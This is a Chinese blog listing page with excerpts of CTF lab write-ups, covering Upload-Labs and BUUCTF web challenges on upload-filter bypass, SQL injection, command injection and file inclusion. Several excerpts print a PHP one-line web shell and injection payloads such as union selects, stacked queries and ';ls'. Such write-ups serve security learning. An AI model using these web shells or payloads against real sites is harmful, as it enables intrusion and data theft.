- 博客(17)
- 收藏
- 关注
原创 Upload-Labs-Windows Pass-03
此题暂时还未解出,做个记录。解题过程: 上传文件a.php,内容为:<?php eval($_POST['shell']);?> 得到提示: 对文件类型进行了过滤,把文件名改为a.php3后,可以成功上传: 但文件名变为了一串数字。虽然我们上传成功了,但是 201111211141527218.php3却不能解析,要正常解析还需要满足以下条件任意一种:条件一:Apache的 httpd.conf 中有如下配置代码:AddType a...
2021-11-21 20:05:50
2554
原创 Upload-Labs-Windows Pass-02
可采用Pass-01同样的解题方法。查看源码:根据源码可知,只要保证Content-Type:image/jpeg, image/png, image/gif 即可。MIME类型在浏览器中显示的内容有 HTML、有 XML、有 GIF、还有 Flash ……浏览器是根据MIME Type(资源的媒体类型)来区分。媒体类型通常是通过 HTTP 协议,由 Web 服务器告知浏览器的,更准确地说,是通过 Content-Type 来表示的。MIME Type 不是个人指定的,...
2021-11-19 11:22:04
3276
原创 Upload-Labs-Windows Pass-01
Pass-01题目:解题:步骤1:上传文件上传一句话木马,编辑文件a.php,内容为:<?php eval($_POST['shell']);?>直接上传的话,会提示错误。题目要求选择图片格式上传,文件名改为a.jpg,内容为:<?php eval($_POST['shell']);?>,然后通过burp suite来修改上传文件名字。步骤2:改文件名把a.jpg改为a.php,然后点send,会发现上传成功:<img src="../.
2021-11-17 14:58:14
2682
原创 buuctf web 极客大挑战2019 Upload
题目:解题:1:上传“一句话木马”文件 编辑文件a.php:<?php @eval($_POST['shell']);?> 上传后得到: Not image! 提示需要上传文件为 image。2:修改Content-Type 上传a.php文件时,用burp suite抓包得到: 修改Content-Type为 image/gif 提示:NOT ...
2021-09-12 17:10:24
895
1
原创 BUUCTF WEB Easy Calc
scandir():列出参数目录中的文件和目录readfile():读取文件内容利用scandir()找到flag在哪,再利用readfile()读取文件内容,从而得到flagfile_get_contents()这个函数chr(47) ==> /,绕过过滤。47对于ASCII码就是 “/”,因为我们要从根目录开始找flag所在文件原理:加空格使waf把num参数错误解析成%20num,这个参数是不存在的,但php解析的时候会自动把空格删掉,从而bypass。只需要在变量前添
2021-08-26 20:54:38
376
1
原创 BUUCTF PWN test_your_nc
题目:解题:1:用IDA打开test 用file命令查看文件test为64位。 用IDA pro (64-bit)打开:2:用netcat连接Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。...
2021-08-09 22:59:13
1186
1
原创 BUUCTF WEB 极客大挑战 2019 Http
题目:解题:1:查看网页源代码 浏览页面,没有发现有用信息,查看源代码发现:Secret.php2:尝试访问/Secret.phpHTTP RefererHttp Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器借此可以获得一些信息用于处理。比如从我主页上链接到一个朋友那里,他的服务器就能够从HTTP Referer中统计出每天有多少用户点击我...
2021-08-04 10:59:15
916
1
原创 BUUCTF WEB 极客大挑战 2019 Knife
题目:解题:1:一句话木马 形式:<?php eval($_POST['shell']);?> 原理:存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。2:尝试用HackBar传数据HackBar:chrome插件,是web渗透的SQL注入工具。插件下载:https://github.com/Mr-xn/hackbar2.1.3...
2021-08-02 22:51:05
415
原创 BUUCTF WEB GXYCTF2019 Ping Ping Ping
题目:解题:1:尝试传参ip=127.0.0.1http://a82e96f4-d502-4bd8-8cec-4109958043f7.node4.buuoj.cn/?ip=127.0.0.12:尝试查看目录内容http://a82e96f4-d502-4bd8-8cec-4109958043f7.node4.buuoj.cn/?ip=127.0.0.1;ls 得到两个文件:flag.php,index.php3:尝试查...
2021-08-02 11:52:23
294
原创 BUUCTF WEB 极客大挑战 2019 LoveSQL
题目:解题:1:输入万能密码 用户名:admin' or 1=1# 密 码:1 2:确定回显列 用户名:1' union select 1,2,3;# (select 1,2...逐步增加,直到不报错即得到正确的列数) 密 码:1 说明查询列数为3,回显列为2,3。UNION 操作符用于合并两个或多个 SELECT 语句的结果集。...
2021-07-27 17:18:22
637
原创 BUUCTF WEB ACTF2020 新生赛 Exec
题目:解题:1:尝试输入127.0.0.1 正常回显。2:尝试管道、连接符 管道符 | 连接符 || & && ;command A |commandB:将A命令的输出作为B命令的输入,| 前面和后面命令都要执行,无论前面真假。command A ||command B:如果A命令执行成功则不执行B命令,A命令执行失败才执行B命令。 comm...
2021-07-27 13:58:28
262
原创 BUUCTF WEB 极客大挑战 2019 Secret File
题目:解题:1:查看源码 按F12得到./Archive_room.php2:尝试访问Archive_room.phphttp://125b77e6-d671-4462-a920-4dab58668fd1.node4.buuoj.cn/Archive_room.php3:点击按钮“SECRET” 跳转到页面:http://125b77e6-d671-4462-a920-4dab58668fd1.node4.buuoj.cn...
2021-07-26 11:15:07
209
原创 BUUCTF WEB SUCTF 2019 EasySQL
题目:尝试+WP:1:输入数字2:输入字母3:尝试查询数据库4:尝试查询表得到了Flag表。5:尝试查看表内容5.1:尝试:1;select * from Flag;#说明被过滤了。5.2:尝试:十六进制编码将 select * from Flag 十六进制编码为:73656C656374202A2066726F6D20466C6167输入:1;SET @a=0x73656C6...
2021-07-21 15:03:14
396
1
原创 BUUCTF WEB ACTF2020 新生赛 Include
题目:解题:1:点击tips2:F12查看源码 什么也没有。3:文件包含漏洞 根据url:http://588343f8-9c53-4080-b98f-81c243df6870.node4.buuoj.cn/?file=flag.php 和题目“ACTF2020 新生赛 Include”,可猜测为Include文件包含漏洞。可以用php://filter协议来查看源文件内容;构造:file=php://filter...
2021-07-19 14:33:07
555
3
原创 BUUCTF WEB 强网杯 2019 随便注
1:题目2:解题2.1:尝试点提交url变为:http://b61f33a4-644b-402a-9da5-4bdf8043f954.node4.buuoj.cn/?inject=1 可知传入的参数名为 inject,参数为1。2.2:尝试万能钥匙 输入:1' or '1'='1';# 可得到所有数据,但没有flag。2.3:尝试联合查询 输入:1' union select 1,2;#...
2021-07-15 16:35:29
588
2
原创 BUUCTF WEB HCTF 2018 WarmUp
1:题目2:解题2.1:查看源码 按F12发现提示:<!--source.php-->2.2:尝试打开source.php http://f25ece33-0891-47a1-b89a-eefac33b2f4f.node4.buuoj.cn/source.php 得到代码:2.3:解析代码2.3.1:代码正文解析 if (! empty($_REQUEST['file']) &...
2021-07-11 16:14:40
1083
8
原创 CTFSHOW WEB 红包题第二弹
题目:解题:1:F12--查看源码发现提示:?cmd=<!-- hint:?cmd= -->2:尝试通过url传参数cmd,随意输入cmd=aaahttp://2799b166-4390-45e9-a3f4-711d2a5e64c5.challenge.ctf.show:8080/?cmd=aaa 得到:if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); }if(pr..
2021-07-05 00:02:28
4151
7
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人